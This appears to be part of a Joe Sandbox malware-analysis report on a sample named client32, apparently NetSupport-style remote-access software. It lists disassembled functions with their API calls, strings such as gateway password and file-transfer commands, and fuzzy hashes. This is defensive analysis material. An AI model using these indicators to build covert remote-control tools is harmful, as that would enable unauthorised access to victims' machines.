Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Palette$ObjectRealizeSelect$AllocGlobalReleaseStock
String ID:
API String ID: 1969595663-0
Opcode ID: 460c3ef96ebe8ed115c01ac097ffa682f3726c3033c725e46577f46786f58dec
Instruction ID: 99ab53906cf2362fb71f393f1a059b673ec6ad63d3e9dfc730451934018f7e7b
Opcode Fuzzy Hash: 460c3ef96ebe8ed115c01ac097ffa682f3726c3033c725e46577f46786f58dec
Instruction Fuzzy Hash: 747193B1E01229AFDB01DFE9CC89BEEB7B9FF88714F148056FA15E7244D67499008B61

Function 685A4CF0 Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 196COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 685A4D1C
_free.LIBCMT ref: 685A4E16
_free.LIBCMT ref: 685A4E5D
_free.LIBCMT ref: 685A4E8B
_free.LIBCMT ref: 685A4EB9

Part of subcall function 685A7B60: _sprintf.LIBCMT ref: 685A7B77

Part of subcall function 685A77E0: _free.LIBCMT ref: 685A77EF

_free.LIBCMT ref: 685A4EF6

Part of subcall function 685963C0: EnterCriticalSection.KERNEL32(685DB898,00000000,?,00000000,?,6859D77B,00000000), ref: 685963E8
Part of subcall function 685963C0: InterlockedDecrement.KERNEL32(-0003F3B7), ref: 685963FA
Part of subcall function 685963C0: EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,6859D77B,00000000), ref: 68596412
Part of subcall function 685963C0: GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6859643B
Part of subcall function 685963C0: GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6859646F
Part of subcall function 685963C0: GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 685964A3
Part of subcall function 685963C0: _memset.LIBCMT ref: 685965C8
Part of subcall function 685963C0: LeaveCriticalSection.KERNEL32(?,?,6859D77B,00000000), ref: 685965D7
Part of subcall function 685963C0: LeaveCriticalSection.KERNEL32(685DB898,?,00000000,?,6859D77B,00000000), ref: 685965F2

_free.LIBCMT ref: 685A4EED

Part of subcall function 685B1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 685B1C13
Part of subcall function 685B1BFD: GetLastError.KERNEL32(00000000), ref: 685B1C25

_free.LIBCMT ref: 685A4F09
SetLastError.KERNEL32(?), ref: 685A4F12

Part of subcall function 68598C30: _memset.LIBCMT ref: 68598C5B
Part of subcall function 68598C30: _free.LIBCMT ref: 68598CCC

Part of subcall function 68598B50: _memset.LIBCMT ref: 68598B68
Part of subcall function 68598B50: wsprintfA.USER32 ref: 68598B87

Strings

Gateway_Operator, xrefs: 685A4D66
Gateway_Gsk, xrefs: 685A4D56
FNAME=%s, xrefs: 685A4E7F
SUB=%s, xrefs: 685A4E51
ON=%s, xrefs: 685A4E0A
LINK=%s, xrefs: 685A4EAD
Gateway_Password, xrefs: 685A4D82
GSK=%s, xrefs: 685A4DDC
PWD=%s, xrefs: 685A4E29
CMD=PUTFILELINK, xrefs: 685A4DBB

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: _free$CriticalSection_memset$AddressProc$EnterErrorLastLeave$DecrementFreeHeapInterlocked_sprintfwsprintf
String ID: CMD=PUTFILELINK$FNAME=%s$GSK=%s$Gateway_Gsk$Gateway_Operator$Gateway_Password$LINK=%s$ON=%s$PWD=%s$SUB=%s
API String ID: 2025600352-1925890548
Opcode ID: 8bc68279fb7c7a0bcb301af513f49fc0cc6040012a713d66e69809e99d5e6c43
Instruction ID: b6daf296b3693ded6426296a4fddc879f4e23bd2df7b1c323a826f5c34a91a51
Opcode Fuzzy Hash: 8bc68279fb7c7a0bcb301af513f49fc0cc6040012a713d66e69809e99d5e6c43
Instruction Fuzzy Hash: CA619576C40248ABDF11DBE4CC90FFEBBB8AF84304F904149E915BB245EB31A945CBA5

Function 685A0F10 Relevance: 31.8, APIs: 7, Strings: 11, Instructions: 324COMMON

Download Yara Rule

APIs

Part of subcall function 685ADBD0: _malloc.LIBCMT ref: 685ADBE9
Part of subcall function 685ADBD0: wsprintfA.USER32 ref: 685ADC04
Part of subcall function 685ADBD0: _memset.LIBCMT ref: 685ADC27

_memset.LIBCMT ref: 685A0FAD
EnterCriticalSection.KERNEL32(685DB898,685D0E3D,?,?,?,?,?,?,00000000), ref: 685A1293
LeaveCriticalSection.KERNEL32(685DB898,?,?,?,?,?,?,00000000), ref: 685A12E3
EnterCriticalSection.KERNEL32(685DB898,685D0E3D,?,?,?,?,?,?,00000000), ref: 685A1316
LeaveCriticalSection.KERNEL32(685DB898,?,?,?,?,?,?,00000000), ref: 685A132D
std::exception::exception.LIBCMT ref: 685A135B
__CxxThrowException@8.LIBCMT ref: 685A1376

Strings

MORE, xrefs: 685A107F
RESULT, xrefs: 685A1061
TIM, xrefs: 685A1142
b, xrefs: 685A12CE
TXT, xrefs: 685A1100
END_REC, xrefs: 685A1250
0f]h, xrefs: 685A1365, 685A136B
UID, xrefs: 685A10BE
FLG, xrefs: 685A1163
ENC, xrefs: 685A10DF
CAP, xrefs: 685A1121

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave_memset$Exception@8Throw_mallocstd::exception::exceptionwsprintf
String ID: 0f]h$CAP$ENC$END_REC$FLG$MORE$RESULT$TIM$TXT$UID$b
API String ID: 275297366-4148050440
Opcode ID: a35f97122e9a8ebb71d7bd563c7905ef89721ef604c00d881922f59d0baa7c3e
Instruction ID: 47af7e990493cb89dc2e192d2e92cecb101a4b348e4db8ab30454d13630f5143
Opcode Fuzzy Hash: a35f97122e9a8ebb71d7bd563c7905ef89721ef604c00d881922f59d0baa7c3e
Instruction Fuzzy Hash: 3BC18EB5D40259AFDF10DFA4DCC1AEEBBB4BF54304F80056AD81AA6204E7355E88CB66

Function 111032F0 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 239libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(psapi.dll,7E4636A2,00000001,?,?,00000000,11185E66,000000FF,?,1110421F,00000000,?,?,?), ref: 1110332D

Part of subcall function 111347D0: GetVersion.KERNEL32(00000000,74DF0BD0,00000000), ref: 111347F3
Part of subcall function 111347D0: GetModuleHandleA.KERNEL32(ntdll.dll), ref: 11134814
Part of subcall function 111347D0: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 11134824
Part of subcall function 111347D0: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 11134841
Part of subcall function 111347D0: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 1113484D
Part of subcall function 111347D0: _memset.LIBCMT ref: 11134867

FreeLibrary.KERNEL32(00000000,?,1110421F,00000000,?,?,?), ref: 1110337F
LoadLibraryA.KERNEL32(Kernel32.dll), ref: 111033B6
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 1110343F
GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 111034C1
SetLastError.KERNEL32(00000078), ref: 111034E3
SetLastError.KERNEL32(00000078), ref: 111034F0
OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 11103509
OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,?,?,1110421F), ref: 11103570
GetTokenInformation.ADVAPI32(?,0000000C(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,1110421F), ref: 11103597
CloseHandle.KERNEL32(?,?,?,?,?,?,1110421F), ref: 111035EF

Part of subcall function 11103110: GetTickCount.KERNEL32 ref: 1110313E
Part of subcall function 11103110: EnterCriticalSection.KERNEL32(111EC5C4), ref: 11103147
Part of subcall function 11103110: GetTickCount.KERNEL32 ref: 1110314D
Part of subcall function 11103110: GetTickCount.KERNEL32 ref: 111031A0
Part of subcall function 11103110: LeaveCriticalSection.KERNEL32(111EC5C4), ref: 111031A9

Part of subcall function 110F3BB0: WaitForSingleObject.KERNEL32(?,00000000,?,?,111049C5,?,TerminateVistaUI), ref: 110F3BC1
Part of subcall function 110F3BB0: InterlockedExchange.KERNEL32(?,00000000), ref: 110F3BCD
Part of subcall function 110F3BB0: CloseHandle.KERNEL32(00000000), ref: 110F3BD8
Part of subcall function 110F3BB0: InterlockedIncrement.KERNEL32(111EC5B4), ref: 110F3C05

CloseHandle.KERNEL32(00000000), ref: 111035F6
FreeLibrary.KERNEL32(00000000,?,?,?,?,1110421F), ref: 11103646
FreeLibrary.KERNEL32(00000000,?,?,?,?,1110421F), ref: 11103651

Strings

EnumProcesses, xrefs: 11103429
ProcessIdToSessionId, xrefs: 111034BB
psapi.dll, xrefs: 11103328
Kernel32.dll, xrefs: 111033B1

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: HandleLibrary$AddressProc$CloseCountFreeTick$CriticalErrorInterlockedLastLoadModuleOpenProcessSectionToken$EnterExchangeIncrementInformationLeaveObjectSingleVersionWait_memset
String ID: EnumProcesses$Kernel32.dll$ProcessIdToSessionId$psapi.dll
API String ID: 555709589-617439319
Opcode ID: b3600c8a1196151fdc18ced844d466fa8542599c62b3b8d15a5985b8e22f9588
Instruction ID: 7102d60838122e4a6cb8a6baed9df5fda1baf24c5a04c60c3b4407c25d2de74c
Opcode Fuzzy Hash: b3600c8a1196151fdc18ced844d466fa8542599c62b3b8d15a5985b8e22f9588
Instruction Fuzzy Hash: 80A14975D0426A9FDB249F558DC5ADEFBB4BB08304F4085EEE659E3240D7705AC08F61

Function 685A1F90 Relevance: 30.0, APIs: 8, Strings: 9, Instructions: 240networkCOMMON

Download Yara Rule

APIs

Part of subcall function 685ADBD0: _malloc.LIBCMT ref: 685ADBE9
Part of subcall function 685ADBD0: wsprintfA.USER32 ref: 685ADC04
Part of subcall function 685ADBD0: _memset.LIBCMT ref: 685ADC27

getpeername.WSOCK32(?,?,?,685D0E3D,?,?,?,?), ref: 685A2198
htons.WSOCK32(?,?,?,?,?,685D0E3D,?,?,?,?), ref: 685A21A9
EnterCriticalSection.KERNEL32(685DB898,?,?,?,685D0E3D,?,?,?,?), ref: 685A21D9
LeaveCriticalSection.KERNEL32(685DB898,?,?,?,?), ref: 685A220C
EnterCriticalSection.KERNEL32(685DB898,?,?,?,685D0E3D,?,?,?,?), ref: 685A2217
LeaveCriticalSection.KERNEL32(685DB898,?,?,?,?), ref: 685A2227
std::exception::exception.LIBCMT ref: 685A226B
__CxxThrowException@8.LIBCMT ref: 685A2286

Strings

FNAME, xrefs: 685A20DC
a3Zh, xrefs: 685A1FB2
SUB, xrefs: 685A20FA
RESULT, xrefs: 685A20A0
LWT, xrefs: 685A2139
LINK, xrefs: 685A20BE
'.Zh, xrefs: 685A1FBE
FSIZE, xrefs: 685A2118
0f]h, xrefs: 685A2275, 685A227B

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$Exception@8Throw_malloc_memsetgetpeernamehtonsstd::exception::exceptionwsprintf
String ID: '.Zh$0f]h$FNAME$FSIZE$LINK$LWT$RESULT$SUB$a3Zh
API String ID: 205723298-1718257289
Opcode ID: 5e58fbd1e4420e745822c42949db7773b39d835b6cb59605cb24d54befee342a
Instruction ID: 17518058462df5a95a9e859a237f361c255b55374482354ad01fd19c26f869ce
Opcode Fuzzy Hash: 5e58fbd1e4420e745822c42949db7773b39d835b6cb59605cb24d54befee342a
Instruction Fuzzy Hash: DE913BB5D00259AFDF10DFA8CC81AEEBBB5FF98304F90452AE959E7200EB305A45CB55

Function 6859A000 Relevance: 29.9, APIs: 7, Strings: 10, Instructions: 197COMMON

Download Yara Rule

APIs

__wcstoui64.LIBCMT ref: 6859A057

Part of subcall function 685B49AE: strtoxl.LIBCMT ref: 685B49D0

ctl_getsession.HTCTL32(?), ref: 6859A09B
EnterCriticalSection.KERNEL32(685DB898,?), ref: 6859A0BA
LeaveCriticalSection.KERNEL32(685DB898), ref: 6859A0EB
_strncat.LIBCMT ref: 6859A132
_free.LIBCMT ref: 6859A22F
_free.LIBCMT ref: 6859A238

Strings

226546, xrefs: 6859A1A3
CONNECTION_ID=%u, xrefs: 6859A198
a3Zh, xrefs: 6859A011
CONTROL_ADDR, xrefs: 6859A076
CONNECTION_ID, xrefs: 6859A040
CMD=CONNECT_REPLY, xrefs: 6859A187
RESULT=%d, xrefs: 6859A1BD
CLIENT_NAME=%s, xrefs: 6859A1AB
NC_, xrefs: 6859A137, 6859A13C
CONTROL_NAME, xrefs: 6859A061

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection_free$EnterLeave__wcstoui64_strncatctl_getsessionstrtoxl
String ID: 226546$CLIENT_NAME=%s$CMD=CONNECT_REPLY$CONNECTION_ID$CONNECTION_ID=%u$CONTROL_ADDR$CONTROL_NAME$NC_$RESULT=%d$a3Zh
API String ID: 1400833098-69946554
Opcode ID: b256f6c7ce97a1aca1d35756cddfb36b1f3e01d72d418d40c6b43bb2cffb1d26
Instruction ID: 4ae83a8f46d686d6f8a303bb35ff146247ae8d90184a57b7d0eaee9e9555265b
Opcode Fuzzy Hash: b256f6c7ce97a1aca1d35756cddfb36b1f3e01d72d418d40c6b43bb2cffb1d26
Instruction Fuzzy Hash: F57172B5D40248AFCF11DFE8DC80BEEBBF9AF48304F948429E855EB204E77499458B65

Function 110F5300 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 162windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

SetCursor.USER32(00000000,?,00000000), ref: 110F53CB
ShowCursor.USER32(00000000), ref: 110F53D8
OpenEventA.KERNEL32(00100000,00000000,NSLockExit), ref: 110F53E9
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,?,000000BF), ref: 110F5413
GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F5432
TranslateMessage.USER32(?), ref: 110F5443
DispatchMessageA.USER32(?), ref: 110F544C
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000BF), ref: 110F5460
CloseHandle.KERNEL32(?), ref: 110F5473
GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F548B
TranslateMessage.USER32(?), ref: 110F549E
DispatchMessageA.USER32(?), ref: 110F54A7
GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F54BA
ShowCursor.USER32(00000001), ref: 110F54C2
SetCursor.USER32(?), ref: 110F54CF

Strings

NSLockExit, xrefs: 110F53DE

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$Cursor$DispatchMultipleObjectsShowTranslateWait$CloseEventHandleOpen_memsetwsprintf
String ID: NSLockExit
API String ID: 2358329513-1578567420
Opcode ID: 8e6a3f007d3c7767c2c9280eeeacc41a13dd947ceb4fa7b85dbd1afa2711b587
Instruction ID: da66d542c3fb9b9b9736b56b4e9605354d9b8fdeed183c23e7030b173a746b46
Opcode Fuzzy Hash: 8e6a3f007d3c7767c2c9280eeeacc41a13dd947ceb4fa7b85dbd1afa2711b587
Instruction Fuzzy Hash: 0451AC75E0032AABDB11DFA48C81FEDF7B8EB44718F1085A5E615E7184EB71AA40CF91

Function 68599E20 Relevance: 26.4, APIs: 1, Strings: 14, Instructions: 152COMMON

Download Yara Rule

APIs

Part of subcall function 685A7BE0: _memset.LIBCMT ref: 685A7BFF
Part of subcall function 685A7BE0: _strncpy.LIBCMT ref: 685A7C0B

__wcstoui64.LIBCMT ref: 68599EF8

Strings

a3Zh, xrefs: 68599E25
RESULT, xrefs: 68599EA1
CMPI, xrefs: 68599EE1
strlen(p) == 12, xrefs: 68599F58
SERVER_VERSION, xrefs: 68599E60
PROTOCOL_VER, xrefs: 68599F07
1.0, xrefs: 68599E27, 68599E37
MAC, xrefs: 68599F24
Gateway rejected client connection because licence was exceeded., xrefs: 68599F9D
FAILED_REASON, xrefs: 68599EC1
Gateway rejected client connection because security check failed., xrefs: 68599FA4
MAXPACKET, xrefs: 68599E81
a+Zh, xrefs: 68599E46, 68599F79, 68599E49, 68599F7C
e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 68599F53

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: __wcstoui64_memset_strncpy
String ID: 1.0$CMPI$FAILED_REASON$Gateway rejected client connection because licence was exceeded.$Gateway rejected client connection because security check failed.$MAC$MAXPACKET$PROTOCOL_VER$RESULT$SERVER_VERSION$a+Zh$a3Zh$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$strlen(p) == 12
API String ID: 2670788892-402558523
Opcode ID: 8f34d15658b85633f739ca226c59839e2556280a40b0e8f33d8ae2c4ebd695d6
Instruction ID: 1dbb51728e7e1bb68996ed7f22fd4c3f1607b46b4df2bfeb88f8fc75ee264342
Opcode Fuzzy Hash: 8f34d15658b85633f739ca226c59839e2556280a40b0e8f33d8ae2c4ebd695d6
Instruction Fuzzy Hash: 23415CB9E44282BFEF0196B49C45BBFB2A89B41249FC40024EC58DA341F735EE54C3E6

Function 6859FC60 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6859FCB2
std::_Xinvalid_argument.LIBCPMT ref: 6859FCD4
_memmove.LIBCMT ref: 6859FD30
_memmove.LIBCMT ref: 6859FD55
_memmove.LIBCMT ref: 6859FD69
_memmove.LIBCMT ref: 6859FD9B
_memmove.LIBCMT ref: 6859FF42
std::_Xinvalid_argument.LIBCPMT ref: 6859FF76

Strings

invalid string position, xrefs: 6859FF71
string too long, xrefs: 6859FCAD, 6859FCCF

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: _memmove$Xinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1771113911-4289949731
Opcode ID: 82dd4ba4bc08af244ae9d6a02e77c4ac146e7442ba684e5c54fe6b6afb63173e
Instruction ID: c0b8f27de1ce6cd829755d0c4de5306f4c9dede518564315ee05c0f4e4a83482
Opcode Fuzzy Hash: 82dd4ba4bc08af244ae9d6a02e77c4ac146e7442ba684e5c54fe6b6afb63173e
Instruction Fuzzy Hash: 01B15D717501849BDF28CE1CDC90A9EB7AAEB85714798491CF892CB781C7B4EC81CBA1

Function 11121100 Relevance: 24.8, APIs: 4, Strings: 10, Instructions: 270threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(0000001C), ref: 1112117E
GetCurrentThreadId.KERNEL32 ref: 111211B5
GlobalAddAtomA.KERNEL32(NSMRemote32), ref: 111213AA
GetVersionExA.KERNEL32(?,?,?,00000000), ref: 111213D3

Strings

ScaleToFitTilingFactor, xrefs: 11121420
View, xrefs: 1112120F, 1112130F, 111213F7, 1112140B, 11121425, 11121443, 1112146F, 11121483
NSMRemote32, xrefs: 111213A5
LimitColorbits, xrefs: 11121201
Show, xrefs: 11121376
ScaleToFitMode, xrefs: 11121406
IgnoreScrape, xrefs: 1112146A
LegacyScrape, xrefs: 1112147E
MaxLag, xrefs: 1112143E
ShowBigBlits, xrefs: 111213F2

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

